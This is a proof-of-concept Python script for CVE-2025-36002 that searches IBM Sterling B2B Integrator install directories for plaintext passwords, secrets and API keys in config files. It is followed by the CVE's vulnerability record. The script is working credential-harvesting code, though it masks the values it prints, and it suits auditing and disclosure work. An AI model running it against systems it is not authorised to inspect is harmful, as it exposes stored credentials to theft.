CVE-2025-36002

# CVE-2025-36002 PoC - IBM Sterling B2B Integrator Credential Exposure # This PoC demonstrates how a local user can read stored credentials from configuration files import os import re import sys def search_credentials(config_path): """ Search for credential patterns in IBM Sterling B2B Integrator configuration files. Common locations include: - <install_dir>/properties/<service>.properties - <install_dir>/config/<service>_config.xml - <install_dir>/profiles/<profile>/configuration/... """ credential_patterns = [ re.compile(r'(?i)(password\s*[=:]\s*["\']?)([^"\'\s]+)'), re.compile(r'(?i)(passwd\s*[=:]\s*["\']?)([^"\'\s]+)'), re.compile(r'(?i)(secret\s*[=:]\s*["\']?)([^"\'\s]+)'), re.compile(r'(?i)(credential\s*[=:]\s*["\']?)([^"\'\s]+)'), re.compile(r'(?i)(api[_-]?key\s*[=:]\s*["\']?)([^"\'\s]+)'), ] found_credentials = [] if not os.path.exists(config_path): print(f"[-] Path not found: {config_path}") return found_credentials for root, dirs, files in os.walk(config_path): for filename in files: # Focus on configuration files if filename.endswith(('.properties', '.xml', '.cfg', '.conf', '.ini', '.yaml', '.yml', '.json')): filepath = os.path.join(root, filename) try: with open(filepath, 'r', encoding='utf-8', errors='ignore') as f: for line_num, line in enumerate(f, 1): for pattern in credential_patterns: match = pattern.search(line) if match: found_credentials.append({ 'file': filepath, 'line': line_num, 'type': match.group(1).strip().rstrip('=:').strip(), 'value': match.group(2), 'full_line': line.strip() }) except PermissionError: print(f"[!] Permission denied: {filepath}") except Exception as e: print(f"[!] Error reading {filepath}: {e}") return found_credentials def main(): # Common IBM Sterling B2B Integrator installation paths default_paths = [ '/opt/IBM/SterlingIntegrator', '/opt/IBM/SterlingFileGateway', '/usr/local/IBM/SterlingIntegrator', '/home/stering/install', os.environ.get('SI_HOME', ''), ] print("=" * 60) print("CVE-2025-36002 - Credential Exposure Scanner") print("IBM Sterling B2B Integrator / File Gateway") print("=" * 60) target_path = sys.argv[1] if len(sys.argv) > 1 else None if target_path: paths_to_scan = [target_path] else: paths_to_scan = [p for p in default_paths if p and os.path.exists(p)] if not paths_to_scan: print("[-] No valid installation paths found. Please specify a path.") return for path in paths_to_scan: print(f"\n[*] Scanning: {path}") creds = search_credentials(path) if creds: print(f"\n[!] Found {len(creds)} potential credential(s):") for cred in creds: # Mask sensitive values for display masked_value = cred['value'][:3] + '*' * (len(cred['value']) - 3) if len(cred['value']) > 3 else '***' print(f" File: {cred['file']}") print(f" Line: {cred['line']}") print(f" Type: {cred['type']}") print(f" Value: {masked_value}") print(f" ---") else: print("[-] No credentials found in accessible files.") if __name__ == "__main__": main() # Usage: # python3 cve_2025_36002_poc.py /opt/IBM/SterlingIntegrator # python3 cve_2025_36002_poc.py # Auto-detect installation path

{"cve": {"id": "CVE-2025-36002", "sourceIdentifier": "[email protected]", "published": "2025-10-16T15:15:33.060", "lastModified": "2025-10-25T02:15:39.370", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Sterling B2B Integrator 6.2.0.0 through 6.2.0.5, and 6.2.1.0 and IBM Sterling File Gateway 6.2.0.0 through 6.2.0.5, and 6.2.1.0 stores user credentials in configuration files which can be read by a local user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-260"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-256"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0.0", "versionEndExcluding": "6.2.0.5_1", "matchCriteriaId": "5E7BD82C-7A6C-44C3-BE64-FFF75700EED1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_b2b_integrator:6.2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5071FDDF-398F-4214-B8DD-93ED55F0808F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0.0", "versionEndExcluding": "6.2.0.5_1", "matchCriteriaId": "6CF6DF92-A6D4-4FBB-8662-5BE9D814D911"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_file_gateway:6.2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F5074FA1-0FC6-486B-BCBE-A7BA6E9155D1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:*", "matchCriteriaId": "E492C463-D76E-49B7-A4D4-3B499E422D89"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7248129", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}